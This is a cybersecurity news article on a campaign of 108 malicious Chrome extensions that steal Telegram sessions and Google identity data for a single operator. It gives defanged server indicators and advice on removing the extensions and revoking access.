Dozens of extensions on the Chrome Web Store were found to contain malware controlled by a single operator. Thousands of users who installed them have a backdoor planted, their data and session tokens stolen, while extensions remain live.
The Socket Threat Research Team flagged 108 malicious Chrome extensions as part of a coordinated campaign. They are published under five distinct publisher identities. However, the extensions all route stolen credentials, user identities, and browsing data to servers controlled by the same operator.
Many of the listed extensions span a wide range of product categories, including Telegram or YouTube sidebars, translation or other utilities, and slot machines and other games.
The analyzed extensions deliver promised functionality. However, in the background, they also run malicious code, connect to a command-and-control (C2) server, exfiltrate identities and session data, and open arbitrary websites in users’ browsers.
“The most severe extension in the campaign is Telegram Multi-account. It steals the active Telegram Web session from the victim’s browser and transmits it to tg[.]cloudapi[.]stream/save_session.php (attacker-controlled server) every 15 seconds,” Socket warns in a report.
This data enables the threat actor to access all messages and contacts without the need for a password or multi-factor authentication.
This extension was last updated on February 15th, 2025, meaning it contained malicious functionality for more than a year.
Most (54) malicious extensions target Google account identity – on sign-in, they steal an OAuth2 token and fetch the user's profile from Google to the attacker.
“The OAuth token is used locally and never leaves the browser. What reaches the operator's server is only a permanent identity record: the victim's email, name, and profile picture,” the Socket report explains.
Dozens of extensions (45) contain a universal backdoor that opens arbitrary URLs on browser start.
“Any browser with one of the 45 loadInfo() backdoor extensions installed responds to server-issued commands on every browser start, even if the user never opens the extension,” Socket said.
Other extensions were found to inject ads and other content scripts into the pages the users visit.
The flagged extensions don’t have a massive user base – across all 108 extensions, approximately 20K installs were recorded. Despite takedown requests submitted by Socket to the Chrome Web Store security team and Google Safe Browsing, most of the extensions remain live at the time of reporting.
All extensions share the same backend – a malicious server, cloudapi[.]stream, registered on April 30th, 2022. Socket researchers suspect that the attackers operate a malware-as-a-service platform, where stolen identities and sessions are accessible to purchasers.
How to protect yourself?
Socket provides the full list of malicious extensions and urges users to remove them immediately. Those who used the Telegram Multi-account extension should also log out of all Telegram Web sessions using their Telegram mobile app (go to Settings, select Devices, choose “Terminate all other sessions”).
“If you signed into any of the slot games, casino, or sidebar extensions using Google, treat your Google identity as exposed. Review third-party app access at myaccount.google.com/permissions and revoke any unfamiliar entries,” Socket suggests.
Any registered accounts automatically mean that attackers obtained the user's email address and the provided name.
Security researchers have long been warning that extensions “see everything,” control what users see in the browser, and the entire supply chain is vulnerable to attackers. A recent report demonstrated that extensions can secretly install malware by modifying every downloaded file without requiring any permissions.
Unlock more exclusive Cybernews content on YouTube.
Your email address will not be published. Required fields are markedmarked